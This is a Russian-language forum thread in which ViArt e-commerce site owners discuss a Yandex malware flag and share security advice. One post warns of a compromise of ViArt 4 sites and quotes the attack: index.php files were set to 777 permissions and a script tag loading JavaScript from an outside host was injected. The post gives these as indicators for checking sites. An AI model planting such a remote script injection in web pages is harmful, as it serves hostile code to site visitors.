СРОЧНО ! Бан от Яндекса на движок Viart-а получен :(

[Anstrem]

Получил вот такой вот привет от Яндекса

Внимание!
На страницах сайта miniboots.ru обнаружен вредноносный код !

В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Пожалуйста, удалите вредоносный код. Если при новой проверке код не обнаружится, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.

13.10.2011 Поведенческий анализ

Информация предоставлена партнёром Яндекса компанией Sophos (R)

Насколько я понимаю этот Sophos, движок которого Яндекс видимо использует для проверки, посчитал что скрипты Viart имеют неправильную склонность к "Анализу поведения пользователей"

Не знаю уж чем вдруг "Поведенческий анализ" стал запрещенным, но Яндекс по-любому не переубедить и ЧТО ТО НАДО СРОЧНО МЕНЯТЬ В СКРИПТЕ...
Иначе придется все проекты на Viart закрывать

[kizaika]

Я не думаю, что проблема в виарте. Скорее всего на Вашем сайте действительно появился какой-то вредоносный код. Вот что нашла в инете про поведенческий анализ - Это просто тип вирусов, а не особенности скрипта.
А вообще - у меня год назад на сайте тоже находили вирусы, причем на странице, которой даже не существовало. Я тогда поменяла все пароли, и отправила сайт на перепроверку - вирусов не нашли.

[DimTai]

Вышесказанное касается конкретного сайта, а не используемой CMS. Решать нужно оперативно. Смотреть логи FTP, код, даты изменения файлов, пароли итд.

Что сделать, чтобы это больше не повторялось?

Старайтесь соблюдать следующие правила:

Не сохранять пароли в FTP-клиентах, регулярно менять пароли.
Внимательно относиться к чужому коду, который вы устанавливаете на свой сайт (например, баннерные системы, счетчики и т.д.).
Беречь свой компьютер от вирусов, регулярно обновлять и проверять антивирусом.
Вовремя обновлять стороннюю CMS сайта.
Если CMS пишется/писалась самостоятельно — обязательно следовать рекомендациям по безопасности для соответствующего языка программирования и привлекать специалистов к аудиту безопасности.
Регулярно исследовать исходный код сайта на появление чего-либо подозрительного.
Отслеживать появление новых незнакомых файлов в папках.

PS.
Будет нужна помощь, в Поддержку.

[Anstrem]

Странно, но сейчас проверю, как раз тяну с FTP все содержимое, только увидят ли антивирусники в таком виде в нем что то ? Не может там код вируса быть как то запрятан в БД например ?

[DiShop]

Первое проверьте .htaccess и даты изменения файлов на хосте.

[Anstrem]

Первое проверьте .htaccess и даты изменения файлов на хосте.

.htaccess без изменений, никакого лишнего кода, в том числе сдвинутого пробелами там нет, даты файлов все августовские периода установки, плюс несколько файлов что сам менял только отличаются
Антивирусники ничего в файлах не находят
Единственное что на ум приходит это что поставил на сайт по совету здесь кнопку c siteheart.com, может это на них так ругается ?

Прогнал всеми вирусниками сайт через , там и Sophos в том числе... Вирусов нет.
От хостера навесил на сайт SiteLock, тоже никаких нареканий от них.
Вот те и раз, и что бы это значило ?

[DiShop]

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 5 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.

поставил на сайт по совету здесь кнопку c siteheart.com, может это на них так ругается ?

Вполне может быть. Удалите и на проверку Платонам.

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 5 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.

У Вас еще и конкурент на Виарте без вируса

[Anstrem]

Так проверял то сейчас как раз с установленным этим siteheart.com, вроде ничего не находится... в том числе и Софосом.

Ага, конкурент В соседнем подъезде сидит, это я им Viart порекомендовал, так что это скорее партнер

[ergoline]

извиняюсь за офтоп, но последние месяца полтора яндекс себя не очень адекватно ведет - об этом можно узнать как и на серче так и на нулледе.
платон отправляет в бан сдл-сайты даже за жирный шрифт ( ну понятно что раза 3-4 повторенный))) - но... это уже перебор.

[DiShop]

После введения Яндексом матрикснета (Matrixnet - cамообучающийся алгоритм для разных типов запросов на основании массовых ручных проверок сайтов проверяющие их релевантность и поведенческих факторов пользователей) Платоны и сами смутно представляют, что у них будет в результатах поисковой выдачи.

Ага, конкурент В соседнем подъезде сидит, это я им Viart порекомендовал, так что это скорее партнер

Рекомендовали с вирусом или без?

ЗЫ.
А нас сегодня с точностью до наоборот. Просто праздник какой-то Шопу меньше месяца и на демке сегодня с утра свалилось сразу 5 заказов 4 подтвердили одна определяется непонятно с доставкой. Пытаемся понять откуда это взялось

[nikom11]

помимо проверки на все вирусы, могут быть варианты, что не верно установлены права на папки или файлы, вдруг вы не заметите файлы, которые изменились. Через браузерную строчку многое что можно сделать, и виарт далеко не лучшим образом закрыт от всей грязи. Может вы заметили в посл время какие-то глюки, типа время загрузки или же давн опроверяли комменты по товарам, где прописалось что-то. siteheart.com - явно не шпионский код, приватбанк, фокстрот явно уже бы отказались. В базу - та кже могло залезть. На сервере для безопастности все же надо ставить фаэрволлы от подозрительных ребят;

[Anstrem]

Ура !

Последняя перепроверка сайта не выявила страниц, содержащих вредоносный код.
---
С уважением,
Яндекс.Вебмастер


Только вот на сайте то я ничегошеньки не менял

Нда, Яндекс конечно вытворяет, не соскучишься

[Dio]

А Вы им напишите, что из-за данного досадного недоразумения Ваш интернет-магазин понес убытки в размере 1 000 000 руб и не хотели бы глубокоуважаемые Платоны принять посильное финансовое участие в их возмещении?

[crimea]

Меня попросили разместить здесь предупреждение ребята забаненные на этом форуме.
У них позавчера поломали все сайты на viart, гугл тут же увидел вредоносный код и ограничил доступ. Анализ логов показал что проникновения по фтп с помощью украденного пароля ( это самый распространенный способ) не было. Зараза была внедрена через некую дыру, какую именно они сказать не могут - нет у них такой информации. Вредоносный код поменял права на файлы index.php в корне и папках admin, js, forum, выставил их 777
Затем было вписано следующее:
<script type="text/javascript" src="http://gabinetewa.hekko.
pl/jstools.js">
Сайт вообщем то работал, но как я уже написал гугл указывал на вредоносный код.
Они рекомендуют проверить права на файлы index.php в этих папках и проверить не вписано ли в них что то похожее.
Нападению подверглись сайты только на viart и скрипты которые находились в одной папке с viart.
По их словам viart лицензионный.
Версия 3,6 нападению не подверглась. Проблема с четверкой.

[Shmasser]

Около полутора месяцев назад я заметил, что сайт выходит в ТОП по чужеродным запросам, в то же время Яндекс Вебмастер показал значительное увеличение страниц в Индексе.
В результате проверки я обнаружил в папке Messages лишнюю папку, и в ней немаленький раздел внедрённый неизвестно кем. Удалил, сменил пароли, пока тихо.
Где дырка - так и не понял.

А Вы им напишите, что из-за данного досадного недоразумения Ваш интернет-магазин понес убытки в размере 1 000 000 руб и не хотели бы глубокоуважаемые Платоны принять посильное финансовое участие в их возмещении?

Читайте лицензию Яндекса, они за это не отвечают.

[expy]

Меня попросили разместить здесь предупреждение ребята забаненные на этом форуме.
По их словам viart лицензионный.

Для пользователей лицензионных версий есть практически единственный 100% способ получения бана на форуме. Это тот случай, когда 1 проект на лицензии, а второй пиратский.

Проверил у себя. Всё в порядке.

[crimea]

Ну мы здесь не ваши отношения с ними по поводу бана выясняем, а говорим о серьезных проблемах, которые могут испортить жизнь владельцам магазинов на viart. Есть ли у вас какая статистика таких взломов? Что говорят англичане? Какие рекомендации? Есть ли заплатки? По моему эти вопросы гораздо важнее для нас.

[Anstrem]

Вредоносный код поменял права на файлы index.php в корне и папках admin, js, forum, выставил их 777
Затем было вписано следующее:
<script type="text/javascript" src="http://gabinetewa.hekko.
pl/jstools.js">

Проверил у себя на 4-ке.
Везде права 644, в index.php везде чисто.
Так что не мой случай точно. А вообще если есть реальные дыры, то это прискорбно, надо бы вычищать англичанам в первую очередь, они же основу пишут...

[VST]

говорим о серьезных проблемах, которые могут испортить жизнь владельцам магазинов на viart. Есть ли у вас какая статистика таких взломов? Что говорят англичане? Какие рекомендации? Есть ли заплатки?

Запросов в Поддержку с подобными проблемами не поступало.